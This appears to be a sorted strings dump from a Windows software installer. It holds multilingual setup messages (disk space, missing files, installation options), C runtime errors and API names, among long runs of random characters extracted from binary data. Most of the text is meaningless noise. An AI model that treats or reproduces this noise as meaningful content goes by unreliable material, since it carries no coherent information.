MX`anvbt{gw}rzy
MX`JQZELUFR^KU_NWaTYbTW_JLVEKRDKNFORMlun
 =M]Xm
MXn3@PHT^_jnmxvlur
MXn5?PHT^_jnmxvlur
MX~OX~PY
MXvLWsTb~Sczcr
MXvLWsVb~Sczbr
MXxVb~Yh
+,	MY6w
my}AFI<AB7>ABGH>DC<Sb1IU6OY7MY>O\<R^<Q`@Ud<R]:MU6GP9LT>^dMrz`
M^yATo<UoB[uDZv<Ql/@Z\j
my}dpvhswx
my}dpvhswy
MY[T`blvvt~~q~|ozwz
MY{T_{Ucz[i
MY[Uaclvvv~~s~|ozw}
M^y@Vo<UoAZtD[u<Ql-AZ[l
mYXh\XweflV[SKLPILTMP\RX^TZ^U_
&	M,	Y-	Z
`MyZKx[Ly]L~`O
`MyZKx[Lz^M~`O
M>z<1r7.u;5zA8o9.m6-t>7q:3n7.n4.s86t<;
mz|cqrZlrXj|brnUc{co
Mz~d;%mA$
m]zifubeqb_nb\qe_
m]zifvcfqb_nb\rf`
MZj9EQ:FLIT\EQ[3<Iip
M=zlV`
`Mz[Lx[Lz^M~`O
M<)zM2
M;zM?wL=xL?{PAzI;r>1yC2
mzuWbhIP^?BV45X66`>?`@AW48O/0U67Z;:O*&H!
~mzvdqt]epU^qW]qPWoNUoNUpQZmT^u[hpXdoYevboxdq
mzvXcfJP^?BV45X67`>?`@AW56N./U67Z;:O*&H!
MZ"Yh*ap;r
N0|E*n:#b1
.@":N0G]6Kf0E`';T
N0%M+%G'!F& M-'Q4-O2-Q4-F)"I.$O8)R9)R6%O+
N0%M+%H("F& M-'Q4-P3.P4-F)"I.$N7(R9)S7&P,
N0%M+%H("F& M-'Q4-P3.P4-F)"I.$O8)R9)S7&O+
N0%M+%H("F& M-'Q4-P3.P4-F)"J&
N1{D)n;!h3
N1|F(n;!i4
/N$1W&6['8_!1[
N2'O8(N@-IM4=lK/
N*2PLPcORg
[>~N2tD,i=&]6 Y8%U;+H3$L=41' 
@N2U_CfsPx}u
?N2U_CfsPx}v
[>~N2uE-i=&]6 Y8%U;+H3$M>50&
N+3QLOdOSf
@N@4ZH=pYJ
N53eQVgSXoX]
N5{L0sJ*
N5z<*y>.z<*z?,~A-
 <(#~N6
N6z<*y>.z<*z?,}?-
n?7}F1
N7(mM@{TE
N7/O;0Q=2ZD8_G;aI=cL=eK=cI;bH<cI;hN>mPAtXG
N8|K5zH2~L6
N8zI3~I4~M7
:,-?-.N9;dOQ
:,.?,/N9<ePR
`:NA1I@2D?0D>1B>,DE1GG5QH4TG1RQ<RQ<TR@WQDOXKIVHNXKKYNOXNNYOT^QXYIWUCRJ9I6'E'
NAc/#\(
 nach 
Nachster Schritt
N{~Ajlf
N{~Ajlg
nAj&p^G
Nao consegue encontrar os arquivos do programa para a instala
NAoLBJ0*YB@fKGS:0gRJof]g^U`SKH=57+%4*#1($8&
NAoLBJ0*YB@fKGS:0gRJof]g]V`SKG<48,&5+$0'#7%
nat^RjXMlYQjWO
Navegar...
Navegar CD...
NavK_q
N\b!/50=EAPYBU]
NB>[KEq_X
nb~ocyqasq[nt[oq[nmZijZkn^pqarh[sgZzkYxgTmw`oxmp
NbtI]oF\uAWpAVqEXsL_zUf
nbtVG\TEZncw|t
nbtWI[UF[ncw}s
nbxqasq[nsZnq[nmZijZkn^pqarh[sfZxjXugTmw`oxmp
 N:/[C7pSD
N.#c9,wC3
nc~la{i^wcXwdWv`Tu_SxbVs]Qq[Or\PpZNv`TpZNoYMqZKr[Lq[Oq[Or\Ps[Ov`T{i^
Ncontrol panel
ncr_Wyf_
N`}CVqar
Ncx#k]
$N:/\D8rUF
n del ambiente operativo
=@NDHZU[nV]q]h~[h~P`wWk
NdvJ^pJ^pL_tG_qJ`rObwQbwMYkMV`FNUIOVEPTLV]EKRBKT@KS:CL:FL4;D9@I3>F1>F3?E6@G3=D5AG1?E2>D1=A0<@0<@4@D0<@-:<0<>/;=/8;1:=1:=09<09<1:=0<>'33,44,6609<1:=4<<7@D8QUMv
ndx`Ty_S|_V
>N:/]E9pVF
_NEbOBoXI
{n|e]{gbwbajPVT9CF.6?*,>-*?.+?+*8%"9(%>-*A,*=*'9%$7"$7#"5 
NekHJ;8Q?8TC:YE@aNGjTNt\V
ne pas pouvoir copier 
ne rozwi
n esta incompleta.
Next step
nez]V{[V
NF cQ0lL.e=
nfse_qe_td^k`Xlb[bSWeUVeUVkXS
nfse_qe_td^k`Xlb[bSWeUVkXS
nfycWpZOgSHkYN
nfycWpZOhTIkXP
NG|<1z;-{E:|RKmWRiZWlZYoabyjn
ngiXUfTShSQfUR
#N;GoGTz=Ej
ngr_XsaZgUN
ngsaZyg`^LE
ngub[yg`^LE
ngwh_zjc{oe|og
	&!*>>NHHZVVhPQePQeIObOXldo
N>}H;}L>
N>}H;~M?
@",NHNkmx
N/~H*v@'k6!]-
niaMHZFA\EC^GE^GEYDBYDCYFC\IF^KF_LG\JKD6<D:@tns@>D
niaMHZFA\FA^GE^GEYDBYDCYFC]JG^KF_LG\JKE5<D:@tns@>D
Niekompletna instalacja.
Nie mog
nigTOiVSaNKdOMkUPhUNeSLeRJgVMhYPm[Tm]VVOF,# 
ni|idyhe~mj
&"(>>NII[VVhPQePQeIObOXldo
ni~mjuda}liufd
nimo 32k cores para executar este programa
`njkxv
nk|adzdivdkscjybgxbgxcftbcwedsa`sa`ucbpbcrbcucdr_bt_bu`b
NKCE3(M:2O93P:4X;6ZJDj[Rs_T~h\
N[k:ES;ELIT\EQ[2;Hip
=n~?k|Fq
;n~?k|Fq
nk~mjuda|khufd
nk~olymixlhscdeU\O@H?39b[X
Nkt=Xb'DM.IS9[aAfjJrwQx
Nkt=Xb'DM.IS9[aBgkKsxQx
n`|kVo\Mb[BZg9RI;UH8TD7TF:UH:`MEhSDtYK
}nkzlmzppwooymkyljvjhynjzokypmwoovpqwww
}nkzmk{qqwoownkzmkvjhynjzokypmupoupqvvv
nl}aaW<8\B<^D=aE>tTN
^N~\L|aM
nl~bbW<8\B<]C<aF<tUL
^N~\L}bN
NL`EVI;V4:O6>J6AH;ig_
`nl:HD@KCDLA?F?GKE]a[ilcglc`h]doecqfeujm{pv
nljNM\A=aD?gIDiID`B=V94`C>jPJeE@d?;hB=zD9
nljNM\A=`C>gIDiID`B=V94`C>jPJeE@c>:hB=zD9
nloTPaD@cFAhJEfHC[=8X<5Z@:eIBoNEkGAjE=zF6
N>"MB IA
nm}dh{bm
nm}dh{cn
n-$m/%i+!n0*}@>
n-$m/%i+!n0*~A?
N.(M($J-&I1+L61H50D4.B1.E2+I3(
N.(M($J-&J2,K50H50E5/D1.E2+I3(N-$L0%K+ I
N.(M($L("J-(M72F?6?PC6q\,
^\~NMmABh<=b89^75d;8`61X+'Z,%d5-b3+Y*"Z+#].&]/'^0(X*"d6.]/'X+ ^0%Y,
n_{m[|n\
n_{m[}o]
NMo33[*-Y16g37j48k29k18i-3`.3`27d/6g/9i/9i18i38i26g15f15f/2e/3f15h37j5;p<BwCH
NMo33[*-Y16g38i48k29j08g,2_.3`16c/6g07h.8h07h38i27h06e06e.3d/4e16g37j6<q<BwCH
!$%)NMOB?ACAADBB644GGGMMMDFGSXYW\_:>C\bgY]b+.2*+/&%).-1<6;>7<;68<::422<:9675
!&%)NMQB?ACAADBB644GGGNNNDFFUYZW\_;?D^bgY]b+.2*+/&%)-,0;5:=6;;68<9;533<:9564
nmr_\~khzgd~ig}je
n|mTb\DPfNX[FOQ:BK5:E.2N98fOMR;9>&&H24I26:%(;&%7
nMw_Cv\Dw_Cy^Cu^Dw^Dw_Ct^Eu]Ev_Et_Dx^@w\Gx]Ct\Dx`Dw^Dw^Dv]Cv^Bx_Ew^Dt\D?
`]~NMz?=u84u84zR6sK2qC1m?4vHGtPPr98m:7nA>kIIgMM_IKYACZFEgLHhKDrL:p@.qH9tSDnJ:rQAo^QkTLhUMfTIdTHbOHcPKhPJw[PsI<rA7pI;nC4n:*oB5jKBgLH^MJ_KFbLFgUJpZNrXHqN:wJ5sQ9
\NnK=gZRO
N>|OA|Q@
Non si puo copiare 
Non si trovo gli archivi del programma da installare.
NO puede copiar 
No se encontro archivos de programa para instalar.
nOt^Bv]Cw^Dy^Dt]Cv]Cx_Ev`Dp_Du^Dt]Cx_Es]Dw^Dv^ByaEw^Du^Dv]Cv^Bw^Dv]Cs[C>
nOt]Cs^Cw`FzdHw^Dw^Dv]Cv]Cv]Cw^Du^Du^Ds^Bs^Bu_Cu_Cu_Ct]Cv]Cw^DzdHxcGz`H9
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
 , no total de 
nOv^Bx_Ev]Cv^Bw^Dr]Bu^Dv_Ey]Eu^Dt_Dv\Dt_Ds^Cw^Dv]Cw^Dv]Cx]Cx]Cw^Du]Ex`H<
nOv]Cw^Dv]Cv^Bv]Cr]Bu^Dw^Ds^Bw^Dw^Dr]Av^Bu^Dw^Dv]Cw^Dw^Dx]Cy^Dv\Dt\Fx`H<
N;.P>3cH:u[M
{np8&%?
n\p>(d2
N:pL<}F=
NPrADcEIesu
{npsfhwkk{mn
{npsfhxjk{mn
^n~`p}VcqYboT]gHRY>HO?HQBIRBJQ7CG>JTKhvu
NPxJNwMRyGMrHMtU\}PWxTYzNUvELmENpHPuHOvGPvBKqGPvJSxLU{S\
NPxJOvMRyFLqHNsV\
NQ_0;?(57.58,36,:9+98)68)68(57)57*59(48*66-:<,8:)48*59,8:-99-77*68*68)57/;=+79+47*36*36+47-69+47-77.88+47,58-69,58,58-69.7:.7:/8;199088+55+472>DB_do
NQ_0;?(57/69,36,:9+8:)68(57(65)57*59(4:*66-:<+8:)48*59+8:,:9+77*68*68)57.:<+79+47)25*36+47-69+47-69.7:+47+47-69,58,58-69-69.7:/99199088+64+472>DB_dn
[nq3FK]pwu
[nq5EK^pww
_nqapsq}
nQBtaTRG?"
nQBtaTRG?#
nq|hmq`ilZap[c~jo
nq|hmq`kmX`p[c~jo
NQU[^b|
;n <r ;n%:m
=n <r ;n%:m!3h
N\sN\sWb}an
nsrprrqrpxts{uv~zyvrqokjrporppussvxy{
nsrprrqrpxts{vu~zyvrqokjrporpotrruwxz
nsvejmkpqkmmmoosxv
nsvejmkpqkmnmootyx
NSzEKpGLsSWzOTuNStGNoGMpFOqEMrFNsDMs?HnIRxLSzPW~W^
 NT (32 
NT (32 
nTaF-7R49Q21M11Q21K%#I" T6;^HTF6H(
nTaF.8Q47P10M11Q21J$"H !T6;^HTF6H(
_n~Tcs\l|n~
_n~Tcs]m}o
 NT\Curr
nt{DGO:=E8>C'26!*.
nt{DGO:=E9?D'26!*.
N;.T;+eH:z]H
nt|MOo<9^0)e;<|W_
NtQu9y
}nts^gkhu}n~
}nts^gkiv~l
NTyEKpGMrTX{PTwMTuGNoGNoHNqGMrFNsDMs?HnJQxLSzPW~W^
^nuftzjx~]kj\c\Y^U^bWejaknegja]e[cnfkwqhspfoldolali]hf]ggU]]5>A1:=NWZ
^nugu{iw}]kj\c\Z_V^bWejaknefi`]e[cnfkwqhspfoldolali]hf]ggU]]6?B09<NWZ
NUhGS]2HZ'=g+9m05N'!
NUiGS]2HZ$<f+9m05N'!
nuj`m[YlYZn[Yl[Xhlak
Numer seryjny
NU|NU|TZ
*/&NUP
nurglklmikojlpklqpjnoglo
^nuUekx
^nuWekx
nuxluymx|
NV~;Do1<h+5d0:i(5c,9g,8h
N:vD.vA,|G3t@0tA1vE5{J4
N:vF4oD3vO@
n_vjfxhawg`od`sa`kZWdUSdPO}b^
NV{KSxJRwCLnEMrMT{OV}TZ
 ;N]Vm
NVm7BX-:P7C[5@VALbcm
Nv`mG}
NV~PX}OUxKRyMU}PY
NV~PX}OUxLSzMU}OX
nvwiom_evai
n*!w8/x<4w=5
nw{9AAz
nw{:BBz
NW|BKv:Eq9Ft<J{@L
`N{WGyXHuYHsTEzYI~\L
NW[JMUJLV
nwjOYgOWdMUcKS_HLcNMeMMgOQdMRpTZ
n_wkgxhavf_od`tbakZWdUSdPO}b^
NW}R^zSb|Pezo
NW}R^zSb|Qgyn
NWxITpJVrLYsFTpGYpVl
NWy<Cj-6a
NWZajmrzz~
NX7gsU
nxaHRbGP]AGK//S62X;7P21W8;aFJiLOaBCA 
n_xaYVzt#
nx|cqr[jqWi|brnUc{co
N:xC.vA-|F5v?0v?0xB1~G2
N:xC.vA-|F5v?0v?0yB3~G2
NX_>IQ@KSHSWGQXDNUCKRENRCINAGL=@H+,6*05ls
N -Y"2a
NYaanvbt{gw}rzy
nYhhXiZOcOH]NCWQASRBSQEQKCN@>JBBNBBN?AL??M;:JA<KC;L?9L=<L:<N;=O?<LB;H;1A6,=0%5+!-8/9NDPHAP;6E10@33C7;M59K9<K==M??MAAO:7F>?M<CR8@Q:AR7;M==OBAQB@SDH[DG\PTl`a{YVoZVoQKbRMb`Uo\UpWUsUVreg
nYhhXiZOcOH]NCWQASRBTQEQJBM@>JBBNAAM>@K>>L;;IA;LC:N@:M=;N9;M:<N=<LA<K<2B6,</$4+!-8/9MCOHAN;6E21A33E9;M6:L:=L<<L??MAAO;8G>?M<CR8@Q:AR7;M==OBAQBBTDH[BF^PTl`a{YVoZVoRLeTMb`Uo]UsWUsUVreg
ny~jv}iu|htvenr`gr]er]er[cnZ_l[_kW\nS\tU^mR[hVc
\N|YK{XJ
[N|YKzYJ
~nyucpt]epU^qW]qPWoNUoNUpQZnU_u\fpXdoYevboxdq
{~nYWhHB}J@
NYwO\vYg~ao
NYWP[YYa`\`akkk
\NyXIzWI
<nz5cn@ny8ls2eo9lv2cs3cu2av1^s0[p-Uh3[m4\n3Xf.Q^+MZ,P`&O^
<nz5cn@ny9jr2eo8ku2cs3cu2av1^s0[p-Uh4\n5]o3Xf.R\*MZ,P`(O^
nz|DNN
NZ~FRt@Ln7Dd6DaLZqM[n@J\+2A#(1"%*%%+&)-"**,.8,.8,.8-/:23A(*<
N<zM?wL=xL?yPAyH:r>1zD3
NZ|OZxMZtXf}ap
nZqyex
\NzWI}VH}VHxRF}SF
\NzWI}VHxRF}SF
N+.ZW\}T_{
N-.ZW\}T_z
%O;0]F7rUF
"=o!3\
"O?3\I<pYJ
?O?3\I<sYI
O3!N3 K0
$O?3ZI<pYJ
?;o40kLC|je
?;o40kLC{je
O4&[>/lOA
O>5P<1ZB6hK=qRC
O5xF/_+
O64eQVhTYpY^
O@7`M>
O8uE3qD6
 OA5[I>pYJ
@OA5[I>pYJ
@OA5[I>qZK
Oab2DCR`^x
Oab2DER`^y
oa{d\i
Oah 06$19 /8(8EEO`ab|`bzadygbwei
Oah"14&19!09)9FEO`ac{`bzadygaxei
o-&~B<
o&-~<B
Ob}J\yFSs
ob|~kq
;@OCGYSVkSXmci
oc{~h`
o]}cRrVEjP@gN>m]Myl^}siVPI
o]}cRrVEjP@hO?o\Myl^|siVPI
O^~CSpHUoGUl4?Z
O^~CSpHVmFTk4@X
ocwcXo[PjWOkXPjVKeQFfSDlYJu`QyeTzfUyeS}iW
OddLP@9TE<ZG@YJAbOHjYLtdT
od}dZq^QlYLgUJ_PG]RJRJC,(# 
o de instala
od{eZq^QlYLgVI_QE\QIRJC,(# 
=@ODHZRWlSYpai
O diret
od}iXwgWg
ODj2'd3)h91o92m:0o>6s@>p>>k86h53q;;yFJ
O\d\jphx~z
od~j_yfY{eYxeXwdWu`Qp[LjSDkTEpYJr\PwaUxbV}dZu_Tt`U
ODk3(e4,h91m92m92o=7s@>r>>l97h53n;9|FK
o do disco 
odtkZgo^imYemWclS]kMXlN[lN[nQ`qWgoXgv`rtarvdu|ix
odxeYkaTbgZjdYm`\oZXlVTgJL^;HX7DT.;K+8H)6F-9K%3E
??OEFZX]r]e|ak
o encontrado.
o{}eqwanvanveovT]a3<@KTXY`ciru
O espa
OEsSHlRLcLDYC>T>8[E?iLCpJ>
OEuRHlRLcLDYC>T>8[E?hKBpJ>
oeveYkaTbh[kdYma]pZXkUSfJL^;GY8DV.;K+8H)6F-9K%3E
oevocyodxsm~on~oo
OewL_n]mzTbnGWgFUhN^nP_rM[rM[rN[uN\sQ_vR`wUcyYj}N_rRet
oF}kF~rH
oft\Wud
OfvL_n]mzTbnHWgFUhN^oO^qLZqLZqN\sM[rQ_vSaxTezYj}N_rRet
O[gGP^GKVCGR?BPAAQ>=M:7G94C+'3
og}i^pUKiQEkUIybSw]Qy`P
OgnSQG@SMBYNF\PJbSJiYRq^V
@=oHAtYY}UYrNSh7Hb'?i4?{55]'"#%$
oh|gi{fh
oh~olznnxol|pn
oh~olznnznn|pn
ohq_XsaZgUN
OhxC^l>Xh$ET5VeBer8^j<fs8cr@m{8du1_q)Yk!Rb"Sa%Ua
o_i1 b*
o_i1 c+
OIbTMbcZtcYw\QqD:X\RpeZzi`
OIbUNccZtcYw\QqD:X\Qqf[|i_
oi}ga}jcyfa
oi}ga~kdyfa
oi|gi{fh
oigTQiVSaNKePNkUPiUPeSLdRKgVMhYPm\Sm]VVOF,# 
oi{kezif}li
OiuIbrQgybv
oi~vozokxgjwhfo`^
OiwC^l>Xh$ET6WfCfs7]i>es8crAl{8du1_p)Yk!Rb"Sa'Tb
.O</`I:wYH
OJ_DUH:U39N5>K5AH;ih^
ojjWPq^WkXQzg`s`Y
Oj~Ni~E_wVn
Oj~Ni}F`xVn
ojoTPaD@cFBhIFfHC[=8X<5Z@:eIBoNEkG?jE=zF6
@O =K)FT#CP"ES IX O]&We(Yg'Xf'[g&Zf)[g&Xd&Xdk
@O =K)FT#CP"ES IX O]&We(Yg'Xf'[g&Zf)Zh&Xd&Xdk
{okk\YaROgVSp]X{he}livf`n^XfYQk[TqaZyld
{okk\YdSPgVSp]Xzif}lixe`o\WhXQl\UqaZyld
{okqb_ra^ra^mZUn[Xk[Uo_Yvf_yibwe^q_Xqd\
{okrc`ra^ra^mZUm\Yl\Vq^Ywe^yibxf_q_Xpc[
o\kR>Kr^jwdmT?GP<AE16G2:H3;]HP^IQcNV`KSE3:5$-7*86-A-$>+
o\kR>Kr^jwdmT?GP;CE16G2:G38^IQ_JRcNV`KSE3:5$-7*86-A-$>+
okwa[t\V
okwa[u]W
oKyo^ri[}m`
oKyo^sj\}m`
ole32.dll
~olxllwoowoownkxljxok{rn|soxsprnmpnnprr
]O|[LzWI
O`m0BS%6K"3H(:Q3B\2BY+;R
O`m1CT&7L"3H(:Q2A[2A[,<S
\o~*<M/AR6FVVkz
O?"MB IA	*&
o miejsca na dysku. Czy chcesz kontynuowa
OMI>QE;UI=^ULh_Vsk^|og}l_
omo\UoYNwZK}ZF
|om}qqxpp{tq
|om~rryqq{tq
oms`_clkmtvv{
oms`_clkmuww{
oms^Vo
o}mTb[COfNX]EOQ:BK5:E/1N98gPNR;9>&&H15I26:%(>&&9
omt_]lYTs]X
omt_]mZWs\Z
OMxGE}LJ
on_ML_LIeROiVSfVPfULbPIcQJcTKhYPk[Tg\TXOK3./
on`NM_LIeROiVQhUPfULbPIcQJdULhXQk[Tg[UYPM3./
ONoA@g;:b97`75d;9_41X+'Z,%d5-c4,Z+#Z*$]-']/(\1(V+"b7.]/'X+ ]/$Y+ T&
on}oizlftecdSWN>E<.20()82-\VQzsp~wt|xsywoxxr|}y
^O|]NxXK|[L
O;o/1l"=|,b
O=|OA|Q@
[OoJ<^WN2
o( o( o( m&
O~Ot`co3Rc8@VJ8VK;Q>F\I
O]oUasXeubl}dm{hq
OOUXV\ihlrpo{xt|yu
OOUXV\jimsqp{xt|yu
o@P3e4
Op-;4$
o para a instala
o para usu
Opcion de Instalaciones
Opcje instalacji
~OPEN=-
O pode copiar
OPr@DaEIesu
Oprogramowanie chronione mi
o proibidos.
+OpsSCM
option_count
Options d'installation
OPTIONS_PHOTOEZ
oPu^Dt_Dw`FycGv]Cv]Cv]Cw^Dw^Dv]Cv]Cv]Ct\Dt]Cu^Du^Du^Du^Dw]Ew]EzdHxcGz`H9
oPw^Dw_Cu[Cw^Dv`Dv]Cv]Cv]Cv]Cv]Cv]Cv]Cv]Cs\Bs\Bu\Bt]Cw^Dv^Bx_Eu]EzdHy_G9
Opzioni d'Installazione 
O+}Q4zSDrWIdM>YA5YA5jPDzYJvJ9v>+sA*
oqqlqohmlx|}
ORa33?AAMJIYVXjadrom
o requerido:
}o}rjtno{ugxoUe^lzv
OR~KP}HOzJRzNV~SX
O)$R-%U.&R) O&
|otB.8
}o|tiuoo{ufwnUe^lzv
O]tN\sWc{an
otrhmllmimoikojlqojnoglo
$O$,T#,X!+Z#+Z!'T
O</U;-dG9z]H
ouK8j:
ouK8j9
oU{mWL
OU~OV}JSyIRwKRyMUzLW}JW
*/&OUP
O`uUfyZk
~OUVW3
ouzktx|
OUzSV|UZ{MTuMTuMVxFNsFOqIPq?HmFOuKRyOU~V\
OUzSWzRYzMUsLStNTwHNsFOqGPq@HmGNuLSzPV
,ov\A}
]ov-=DCSZ
]ov.>EBQZ
O;vF4nC2vO@
>Ov:Gm7@b@Edbf
^O}VG}TE
o_vL9p?%y@&
OVq6A]-9U+7S$2N*8T1?[1?\3A^2=[3>\7C_6@^8Ab4?]3>^?Hm>Jn:Fj7Ei0>bBRwXc
^O{`VqaZaqf^LE^KC\IA]I>dL@fMCrXL|_Q
ovsYfiO]tWfmS`oV`
OW5jtS
.OW8G>0O@7PB6QE9\D>eKDtaT
o-&w93
O]#Wc#[f
owvK]\
OWW:BAOUT
OWW:BAPVU
 O]$Xd#[f
OX~KTzIRwITzOV}QW
O^xL\s
OX~OX~OX~RZ
^oxR\cajspy
[Ox^Rri`[
OX}T_{Ucz[i
>oY8cN,P?
>oY8cN,Q=
oyaIQ`HP]AGK//S62Y:7P21W8;aFIiLOaBCA 
o\YeRO_LI[HE[HEcNLgTQ_LEZG@]IDhUNiWP`RLPD@{nli]]2),?8=xqvZTY,%,A:A{szH?I'
o\YeRO`MJ[HE[HEaNKgTQ^LEZG@^JEgTMiWPbRLRC@{nli]]2),?8=xqvZTY,%,A:A{szG>H'
\O{YLz[L
]O|YO|YO
]O|YO}YO
oysnztSa[\leu
OYwP[vYg~bp
\OyYLzZM
o.%z=4
oz~^jnP^dN_bF[]<XY9V["DJ$EN)NV9[hEfuEdsA^l:Va>T_CV^DU^DU^GY`?RZ=PWl
_O{ZJwVF
_O|ZJxWH|WI
`oz`n|dp
OZn?P]/LQ4MW2OT1JN2GH-AB,@A'<=(=?+>A'=B'=C)<C+;B-=D*:@,;>-:<)68)68(46&24*36(14(46+79)57&24'35&24'35'35(46(46'35&24'35(46)57,58,58.88#,/%*+&.-"/-",,$..#/1&24(480NST
O]zOb}Pb
^Oz]OqYMt^R}cWzdX|b[p^Sl^Rj[RiXOjWPkSMuXSpZTr_Xq_XiWPgRJmVNqWPjPI`OFdSJiTLoTJjMDlPEiK@fE<jLAgI>fH=dH=dJ>_I>^H=bI?jJ?aA6iI>mPBlPEmQFuWLyWJpSDnQBkN@lPEuXJ|ZJ|[H~TAzR@vO@pN>pM?vSF
]Oz]OrXLv^R}cWzdX|b[p^Sl^Rj[RiXOjWPkSMuXSpZTr_Xq_XiWPgRJmVNqWPjPI`OFdSJiTLoTJjMDlPEiK@fE<jLAgI>fH=dH=dJ>_I>^H=bI?jJ?aA6iI>mPBlPEmQFuWLyWJpSDnQBkN@lPEuXJ|ZJ|[H~TAzR@vO@pN>pM?vSF
^Oz]OrXLw_S~dX|dX{aZp^Sl^Rj[RjYPjWPkSMtWRpZTq^Wr`YiWPeRKmVNqWPjPIaPGdSJiTLoTJjMDlPEiK@fF;jLAhJ?gI>dH=dJ>`J?^H=bI?jJ?bB7iI>mPBmQFmQFuWLyWJpSDnQBkN@lPEuXJ|ZJ|[H~TA|Q@vO@pN>pM?uRE
OZv5Fa.?Z*;V(6R+9U0>Z3?[6A]1;Y7B`7Eb7B`<Da.>[7Bb>El?En?En>GmIRxir
OZvGMjJPmmo
P=0]G;gPAtZJ~_P
+P=0`J>~cU
P=0SA0cM;z`T
@P<1^F:rUF
=P<1^G8sVG
%P<1^G8sWF
 P ,\1<n5@tBL
p;1{PG
p;1{QE
P1(Y2)n=5
P2~G,p<%f7!]4
P2'K:1)!
P2|K+|L*zJ(zH*vD(tA'{E,
>P?2XC4kN?
P?2XC4kN?
"P>3^H<sYI
P3xG-_+
P4|[AqcQifXkeZmhYvqb|tc
@P@4\I<rXJ
P4~J,|K+zI)yG)vD(uC'{F+
*?#:P4Ld7Og5Me.E[/DZ5F`(9S
P5`\IZbQXaTQ^NO]KN[MN[MQ[JUZE\[GVYCRU;QS=HSCDUHEXIK\NR`NW_HVZATZAQS?JA3>+#>#
P:5qQF~QD
P5T5,jSX}ag
>P?6[G<rXJ
P=6gWP
;P?6]I>qWI
P?6\I<rXJ
P?6]J=qWI
P=6T>3f?0
P6/U=1fD7
P~6W@8jOE
*P!7[&;a%;^#7V(;V(9S-=T,:Q0<T2=S4?U/:P>I]<G[<HZPZlLVhS]nak|^k{hu
*P$8[&;a';^#6W(:W(9S.=W,:Q/;S1<R3>T/:P>I]=H\;GYPZlMWiU]nak|_izhu
P8$rL5
P9}K5wD4
Page abc 
Page abc Installation
pa_iWVgVSlYVub_xe`tb[k[ThXQgWPl^Rk_S
pa{^Oy\Mx[L
p_}aP?
 para 
 par le trait
Pa{R`whs
Pa{Saxes
Pasear...
Pas non trouv
Paso previo
Paso proximo
Passo precedente
Passo successivo
Paste Installation
Paste It 
Paste It Installation
PathFileExistsA
Path not found.
}p{aZv^^hMVQ7D@+4A,.>)+=+*=+*:)&7$!;(%B/,C/.A-,=+*;*':'$:&!<(#B/,1" 6$#>-*I/(J+"cA4
}^<$pB*
PB6dM=~ZJ
pb}hYxgZo
@p|Bo|@ny2cmAr|?p~-^l+\l2bt:ex7bs9ds4_n7^l8_h6Yf.Uc1[h'Ra)Uf-[l1dt0dt$Xh
PBuQIhOKiTRrXXxcb
PBuQIiPLhSQoWWwba
P.!b;-xF4
PCAk__`SQ
$:>PCGYUVjPShZ_tVauM[qYi
Pchavx
pcJ?7!
pcK@8!
~|pdbymi{litc`o^[j[Xj^Xqf^xng{pltkhi`]
p_dD7I-&D/-<.06)+6'%=+*=.,?/09+,7)*6'%5&$7(%4($5&#6%"4$
%:>PDHZSWjPTgZ`sVauM[qZj
pd~la~j_{g\yfYwfY{i^}l_
pd|l`zj^zj^~nb{k_|l`~nb~nb
pdvocyodxsm~nn~oo
PDxK={I7xF/~O3{Z@pbOheWmdZmiWspa|tc
}{peaznj{lirc`p_\j[Xl^Xqf^ymg{plvjhi`]
PeekMessageA
pe~e[ycXycXx`T
{p|e]{gbwbajPVT9CE-7=*->-*>-*?,)9&#;(%=,)A-(=*':&%7"$7#"5 
pe}k`~j_zi\
P\`]elZemT_g`irb_h;9?0.4724+',2.3206]\e
PEq9.a0&f5+k4+e/$e/(g33zGKl:>sAEuBIzEN~KS
PEq9.c0&e4*j4)e/$e/(g42zGKl:>sAEvBIyDM~KS
 pequeno de mais para instalar. Voc
p|~eqwanvanveovU^b3<@KTXX_biru
percorso non trovato.
Pfad nicht gefunden.
p_fD7I-&D/-<.07)+5&$=+*=.,>/-;+,9*(6'%5&$7(%4($5&#7&#4$
pffpbcsfdyjg
pffpcasgcyke
pf~g_~g_
pfhIJT=BG38=*-:()A,.A-,?+*9%$:&%7$!6# 5$!6%"9&#9&#8%"=(&C,*>)'8'$. "3''=*'I-&J) h@4
pfhIJT=BG38>+.<')@,+B.-=+*7%$:'$7$!6# 7$!6%"7&#9&#8%"=(&C,*>)'8&%/!#3''=)(H,%J) h@4
P\`]fjZemT_g`irb_h=9?/-3716+',2.3215Z]b
p`~fTsYHlTBfP>k[Jzm]}siUMF!
p`~fTsYHlTBgP@k[Jzm]}siVNG!
PFu>1}@2
pg|aWoRKaGA`F?lPE~d^
pg}bXpSLaGA_E>lOF}c]
pgdj^\k_[o`]xgdxlh|om
pgdj^\k_[o`]xgdymi}pn~qoyljofcha^_XU
|p|gfvY`tXa|Ua}P^zLZvHYtFXuHXuOXs\[ovjp
%P=GoKV|?Gl
p}gP_q[mW?Q;#5:
pgxj^qdVo\OmWKjTHlTHkSGjRFjRFjRFlTHnVJkSGmSEnTFoUGpVHsYIwZKwZKyZK~]M
pgxj^qdVo\OmWKjTHlTHkSGjRFjRFjRFlTHnWHlUFlUFnTFnTFpUGsYIvYKvWHvUEzXH|[H
@<pHBsYY}TXqOTi7Hb'?i4@z55]'"#'$
#/&)PHIbXXWOZVPa]WnSNc`^tOOg]ZpbZkm^b|aW
#/&)PHI`XXUOZVPa]WnSNca^tOOg]ZpbZkm^b}bX
PhotoSize
%P>HpKV|>El
|p{i^obTk
pir`Y~le
pisf^sf^uf]
pive\l\Oi]SfYQh]UaYR0,'# 
piybZiSH`M@]K@hQI
pj|lfyld}mg~kf
pj|nh~pj}mgyld}mg~kf
pj|omzppxnn}qo~qo
~pj|omzppxnn~rp~qo
PJs98b47d5:k37j/4e/7f17f27h27h.3d,0a-1b04d35e04d15e15e35e24d24d24d./a/0b.1d03f6:o>BwBG~HM
PJs98d47d6:k37j-5d/8d17f38i07h.3d,0a/0b/3d35e24d35e15e35e24d24d24d.0`/1a.2c03f6:o>BwBG~HL
pj{sbmgT]Q@D:&!3 
pj{sbmhU^Q@C:&!2
PjvKbrQgy`w
P[_jy{
=Pk3G`@UkMbxTi
?Pk5F`BTkOaxTi
PKJ?;6
pKmj[gdVwf]weZ
pKnk\gdVwf]xf[
\_PK<)N;,P;,X>.^A3kL=z]N
".PL[{
Please enter the directory you want to keep this software.
Please enter the name you want to specify this software.
Please insert disk#
 plik numer 
{`plVhs^mr_ps]oaJXZEM]INbJT^FRgOW
plxgcnnjp
|plxllwoovnnymkxljypl{rn|soxsptonqoorrr
